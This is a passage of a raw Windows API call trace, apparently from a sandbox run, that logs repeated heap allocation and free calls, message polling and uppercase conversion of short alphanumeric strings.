dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0211.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0211.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.164] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0211.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0211.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0211.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0211.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0211.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0211.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0211.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0211.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0211.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0211.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0211.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.165] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0211.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0211.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0211.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0211.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0211.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.167] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0211.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0211.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0211.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0211.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.168] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0211.168] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0211.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0211.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0211.168] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0211.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0211.169] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0211.169] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0211.169] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0211.169] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0211.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0f8 [0211.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73ce0 [0211.170] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0211.170] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0211.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0211.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0211.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0211.170] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0211.170] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0211.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ce0 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0211.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0211.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0211.172] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0211.172] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0211.173] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0211.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743a0 [0211.173] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0211.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0211.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0211.173] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0211.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0211.174] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0211.174] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0211.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0211.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0211.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0211.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0211.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.175] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743a0 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.175] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0211.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.175] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0211.175] HeapFree (in: 